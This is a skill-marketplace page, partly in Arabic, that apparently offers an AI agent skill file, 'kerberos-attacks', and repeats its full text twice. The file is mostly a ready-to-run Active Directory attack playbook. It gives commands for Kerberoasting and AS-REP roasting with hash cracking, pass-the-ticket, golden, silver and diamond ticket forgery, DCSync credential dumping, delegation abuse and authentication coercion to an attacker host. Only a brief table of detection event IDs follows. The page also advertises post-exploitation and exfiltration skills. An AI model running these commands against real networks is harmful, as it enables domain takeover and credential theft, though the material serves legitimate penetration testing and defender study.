تشغيل أي مهارة في Manus بنقرة واحدة

ابدأ الآن

kerberos-attacks

النجوم٦١٧

التفرعات١٠٢

آخر تحديث٢٨ أبريل ٢٠٢٦ في ٢٣:٥٤

Kerberos protocol attack techniques and exploitation

التثبيت

التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.

تشغيل في Manus

المصدر

CyberStrikeus

CyberStrikeus/CyberStrike

فتح مستودع GitHub عرض مستودعات المنشئ

تنزيل

تشغيل في Manus

المهن ذات الصلةSOC

استنادا إلى تصنيف SOC المهني

محللو أمن المعلوماتمهن الحاسوب والرياضيات·SOC 15-1212

SKILL.md

readonly

name	kerberos-attacks
description	Kerberos protocol attack techniques and exploitation
tags	["kerberos","ad","windows","tickets"]
version	1.0

Kerberos Attack Techniques

Kerberos Authentication Flow

Client                    KDC (DC)                   Service
   │                         │                          │
   │──AS-REQ (username)─────>│                          │
   │<─AS-REP (TGT)───────────│                          │
   │                         │                          │
   │──TGS-REQ (TGT, SPN)────>│                          │
   │<─TGS-REP (TGS)──────────│                          │
   │                         │                          │
   │──AP-REQ (TGS)──────────────────────────────────────>│
   │<─AP-REP────────────────────────────────────────────│

Attack Categories

1. Kerberoasting

Request TGS tickets for service accounts and crack offline.

# Impacket - GetUserSPNs
GetUserSPNs.py domain.local/user:pass -dc-ip 10.0.0.1 -request

# Rubeus (Windows)
Rubeus.exe kerberoast /outfile:hashes.txt

# NetExec
nxc ldap 10.0.0.1 -u user -p pass --kerberoasting kerberoast.txt

# Targeting specific user
GetUserSPNs.py domain.local/user:pass -dc-ip 10.0.0.1 -request-user svc_sql

Crack Hashes:

# Hashcat
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# John
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt

2. AS-REP Roasting

Attack accounts with "Do not require Kerberos preauthentication" enabled.

# Find vulnerable users
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.0.0.1 -format hashcat

# With credentials (query LDAP)
GetNPUsers.py domain.local/user:pass -dc-ip 10.0.0.1 -request

# Rubeus (Windows)
Rubeus.exe asreproast /outfile:asrep.txt

# NetExec
nxc ldap 10.0.0.1 -u user -p pass --asreproast asrep.txt

Crack Hashes:

# Hashcat
hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule

3. Pass-the-Ticket (PtT)

Inject stolen Kerberos tickets into session.

# Export tickets (Mimikatz)
sekurlsa::tickets /export

# Inject ticket (Mimikatz)
kerberos::ptt ticket.kirbi

# Rubeus inject
Rubeus.exe ptt /ticket:base64_ticket

# Linux - export ticket
export KRB5CCNAME=/path/to/ticket.ccache

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

4. Overpass-the-Hash (Pass-the-Key)

Request TGT using NTLM hash instead of password.

# Rubeus
Rubeus.exe asktgt /user:admin /rc4:NTLM_HASH /ptt

# Impacket
getTGT.py domain.local/admin -hashes :NTLM_HASH

# With AES key
getTGT.py domain.local/admin -aesKey AES_KEY

5. Golden Ticket

Forge TGT using KRBTGT hash (requires domain compromise).

# Get KRBTGT hash (DCSync)
secretsdump.py domain.local/admin@10.0.0.1 -just-dc-user krbtgt

# Create Golden Ticket (Mimikatz)
kerberos::golden /user:fakeadmin /domain:domain.local \
  /sid:S-1-5-21-DOMAIN-SID /krbtgt:KRBTGT_HASH /ptt

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-DOMAIN-SID \
  -domain domain.local fakeadmin

# Use ticket
export KRB5CCNAME=fakeadmin.ccache
psexec.py domain.local/fakeadmin@dc01 -k -no-pass

6. Silver Ticket

Forge TGS for specific service using service account hash.

# Get service account hash
secretsdump.py domain.local/admin@10.0.0.1 -just-dc-user svc_sql$

# Create Silver Ticket for CIFS (Mimikatz)
kerberos::golden /user:fakeadmin /domain:domain.local \
  /sid:S-1-5-21-DOMAIN-SID /target:server.domain.local \
  /service:cifs /rc4:SERVICE_NTLM /ptt

# Impacket - Silver ticket for MSSQL
ticketer.py -nthash SERVICE_NTLM -domain-sid S-1-5-21-DOMAIN-SID \
  -domain domain.local -spn MSSQLSvc/sql01.domain.local:1433 admin

Common Service SPNs:

Service	SPN
SMB/CIFS	cifs/hostname
MSSQL	MSSQLSvc/hostname:1433
HTTP	http/hostname
LDAP	ldap/hostname
HOST	host/hostname

7. Diamond Ticket

Modify legitimate TGT (harder to detect than Golden Ticket).

# Rubeus (requires KRBTGT AES key)
Rubeus.exe diamond /krbkey:AES256_KEY /user:user /password:pass \
  /enctype:aes /ticketuser:fakeadmin /ticketuserid:500 /groups:512 /ptt

8. Delegation Attacks

Unconstrained Delegation

# Find unconstrained delegation computers
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Coerce authentication (PrinterBug)
SpoolSample.exe dc01.domain.local attacker.domain.local

# Capture and use TGT
Rubeus.exe monitor /interval:1
Rubeus.exe ptt /ticket:base64_tgt

Constrained Delegation

# S4U2Self + S4U2Proxy
getST.py -spn cifs/target.domain.local domain.local/svc_constrained:pass \
  -impersonate administrator

# Rubeus
Rubeus.exe s4u /user:svc_constrained /rc4:HASH \
  /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

Resource-Based Constrained Delegation (RBCD)

# Add computer account
addcomputer.py domain.local/user:pass -method LDAPS -computer-name FAKE$ -computer-pass Pass123

# Set msDS-AllowedToActOnBehalfOfOtherIdentity
rbcd.py -delegate-to TARGET$ -delegate-from FAKE$ -dc-ip 10.0.0.1 domain.local/user:pass

# Get ticket
getST.py -spn cifs/target.domain.local domain.local/FAKE$:Pass123 -impersonate administrator

# Use ticket
export KRB5CCNAME=administrator.ccache
smbexec.py domain.local/administrator@target.domain.local -k -no-pass

9. Kerberos Relay

Relay Kerberos authentication (KrbRelayUp, KrbRelay).

# KrbRelayUp (local privilege escalation)
KrbRelayUp.exe relay -Domain domain.local -CreateNewComputerAccount \
  -ComputerName YOURCOMPUTER$ -ComputerPassword Password123

# Then use RBCD to escalate

Encryption Types

etype	Algorithm	Strength
0x17 (23)	RC4-HMAC	Weak (NTLM hash)
0x11 (17)	AES128-CTS	Strong
0x12 (18)	AES256-CTS	Strongest

Ticket Fields

Field	Description
cname	Client principal name
crealm	Client realm
sname	Service principal name
srealm	Service realm
enc-part	Encrypted ticket data
authtime	Authentication time
starttime	Ticket valid from
endtime	Ticket expires
renew-till	Renewal expiration

Detection Indicators

Attack	Event ID	Indicator
Kerberoasting	4769	RC4 ticket requests
AS-REP Roast	4768	Pre-auth disabled accounts
Golden Ticket	4769	Non-existent users
Silver Ticket	N/A	Direct service access
Overpass-the-Hash	4768	NTLM in AS-REQ
DCSync	4662	DS-Replication-Get-Changes

المزيد من هذا المستودع

نفس المستودع

ebpf-attacks

CyberStrikeus/CyberStrike

eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux

2026-06-23617

aws-postexploit

CyberStrikeus/CyberStrike

AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3

2026-06-22617

azure-postexploit

CyberStrikeus/CyberStrike

Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation

2026-06-22617

cicd-attacks

CyberStrikeus/CyberStrike

CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab

2026-06-22617

k8s-postexploit

CyberStrikeus/CyberStrike

Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence

2026-06-22617

macos-postexploit

CyberStrikeus/CyberStrike

macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools

2026-06-22617

name	kerberos-attacks
description	Kerberos protocol attack techniques and exploitation
tags	["kerberos","ad","windows","tickets"]
version	1.0

Kerberos Attack Techniques

Kerberos Authentication Flow

Client                    KDC (DC)                   Service
   │                         │                          │
   │──AS-REQ (username)─────>│                          │
   │<─AS-REP (TGT)───────────│                          │
   │                         │                          │
   │──TGS-REQ (TGT, SPN)────>│                          │
   │<─TGS-REP (TGS)──────────│                          │
   │                         │                          │
   │──AP-REQ (TGS)──────────────────────────────────────>│
   │<─AP-REP────────────────────────────────────────────│

Attack Categories

1. Kerberoasting

Request TGS tickets for service accounts and crack offline.

# Impacket - GetUserSPNs
GetUserSPNs.py domain.local/user:pass -dc-ip 10.0.0.1 -request

# Rubeus (Windows)
Rubeus.exe kerberoast /outfile:hashes.txt

# NetExec
nxc ldap 10.0.0.1 -u user -p pass --kerberoasting kerberoast.txt

# Targeting specific user
GetUserSPNs.py domain.local/user:pass -dc-ip 10.0.0.1 -request-user svc_sql

Crack Hashes:

# Hashcat
hashcat -m 13100 hashes.txt wordlist.txt -r rules/best64.rule

# John
john --format=krb5tgs hashes.txt --wordlist=wordlist.txt

2. AS-REP Roasting

Attack accounts with "Do not require Kerberos preauthentication" enabled.

# Find vulnerable users
GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.0.0.1 -format hashcat

# With credentials (query LDAP)
GetNPUsers.py domain.local/user:pass -dc-ip 10.0.0.1 -request

# Rubeus (Windows)
Rubeus.exe asreproast /outfile:asrep.txt

# NetExec
nxc ldap 10.0.0.1 -u user -p pass --asreproast asrep.txt

Crack Hashes:

# Hashcat
hashcat -m 18200 asrep.txt wordlist.txt -r rules/best64.rule

3. Pass-the-Ticket (PtT)

Inject stolen Kerberos tickets into session.

# Export tickets (Mimikatz)
sekurlsa::tickets /export

# Inject ticket (Mimikatz)
kerberos::ptt ticket.kirbi

# Rubeus inject
Rubeus.exe ptt /ticket:base64_ticket

# Linux - export ticket
export KRB5CCNAME=/path/to/ticket.ccache

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

4. Overpass-the-Hash (Pass-the-Key)

Request TGT using NTLM hash instead of password.

# Rubeus
Rubeus.exe asktgt /user:admin /rc4:NTLM_HASH /ptt

# Impacket
getTGT.py domain.local/admin -hashes :NTLM_HASH

# With AES key
getTGT.py domain.local/admin -aesKey AES_KEY

5. Golden Ticket

Forge TGT using KRBTGT hash (requires domain compromise).

# Get KRBTGT hash (DCSync)
secretsdump.py domain.local/admin@10.0.0.1 -just-dc-user krbtgt

# Create Golden Ticket (Mimikatz)
kerberos::golden /user:fakeadmin /domain:domain.local \
  /sid:S-1-5-21-DOMAIN-SID /krbtgt:KRBTGT_HASH /ptt

# Impacket
ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-DOMAIN-SID \
  -domain domain.local fakeadmin

# Use ticket
export KRB5CCNAME=fakeadmin.ccache
psexec.py domain.local/fakeadmin@dc01 -k -no-pass

6. Silver Ticket

Forge TGS for specific service using service account hash.

# Get service account hash
secretsdump.py domain.local/admin@10.0.0.1 -just-dc-user svc_sql$

# Create Silver Ticket for CIFS (Mimikatz)
kerberos::golden /user:fakeadmin /domain:domain.local \
  /sid:S-1-5-21-DOMAIN-SID /target:server.domain.local \
  /service:cifs /rc4:SERVICE_NTLM /ptt

# Impacket - Silver ticket for MSSQL
ticketer.py -nthash SERVICE_NTLM -domain-sid S-1-5-21-DOMAIN-SID \
  -domain domain.local -spn MSSQLSvc/sql01.domain.local:1433 admin

Common Service SPNs:

Service	SPN
SMB/CIFS	cifs/hostname
MSSQL	MSSQLSvc/hostname:1433
HTTP	http/hostname
LDAP	ldap/hostname
HOST	host/hostname

7. Diamond Ticket

Modify legitimate TGT (harder to detect than Golden Ticket).

# Rubeus (requires KRBTGT AES key)
Rubeus.exe diamond /krbkey:AES256_KEY /user:user /password:pass \
  /enctype:aes /ticketuser:fakeadmin /ticketuserid:500 /groups:512 /ptt

8. Delegation Attacks

Unconstrained Delegation

# Find unconstrained delegation computers
Get-ADComputer -Filter {TrustedForDelegation -eq $true}

# Coerce authentication (PrinterBug)
SpoolSample.exe dc01.domain.local attacker.domain.local

# Capture and use TGT
Rubeus.exe monitor /interval:1
Rubeus.exe ptt /ticket:base64_tgt

Constrained Delegation

# S4U2Self + S4U2Proxy
getST.py -spn cifs/target.domain.local domain.local/svc_constrained:pass \
  -impersonate administrator

# Rubeus
Rubeus.exe s4u /user:svc_constrained /rc4:HASH \
  /impersonateuser:administrator /msdsspn:cifs/target.domain.local /ptt

Resource-Based Constrained Delegation (RBCD)

# Add computer account
addcomputer.py domain.local/user:pass -method LDAPS -computer-name FAKE$ -computer-pass Pass123

# Set msDS-AllowedToActOnBehalfOfOtherIdentity
rbcd.py -delegate-to TARGET$ -delegate-from FAKE$ -dc-ip 10.0.0.1 domain.local/user:pass

# Get ticket
getST.py -spn cifs/target.domain.local domain.local/FAKE$:Pass123 -impersonate administrator

# Use ticket
export KRB5CCNAME=administrator.ccache
smbexec.py domain.local/administrator@target.domain.local -k -no-pass

9. Kerberos Relay

Relay Kerberos authentication (KrbRelayUp, KrbRelay).

# KrbRelayUp (local privilege escalation)
KrbRelayUp.exe relay -Domain domain.local -CreateNewComputerAccount \
  -ComputerName YOURCOMPUTER$ -ComputerPassword Password123

# Then use RBCD to escalate

Encryption Types

etype	Algorithm	Strength
0x17 (23)	RC4-HMAC	Weak (NTLM hash)
0x11 (17)	AES128-CTS	Strong
0x12 (18)	AES256-CTS	Strongest

Ticket Fields

Field	Description
cname	Client principal name
crealm	Client realm
sname	Service principal name
srealm	Service realm
enc-part	Encrypted ticket data
authtime	Authentication time
starttime	Ticket valid from
endtime	Ticket expires
renew-till	Renewal expiration

Detection Indicators

Attack	Event ID	Indicator
Kerberoasting	4769	RC4 ticket requests
AS-REP Roast	4768	Pre-auth disabled accounts
Golden Ticket	4769	Non-existent users
Silver Ticket	N/A	Direct service access
Overpass-the-Hash	4768	NTLM in AS-REQ
DCSync	4662	DS-Replication-Get-Changes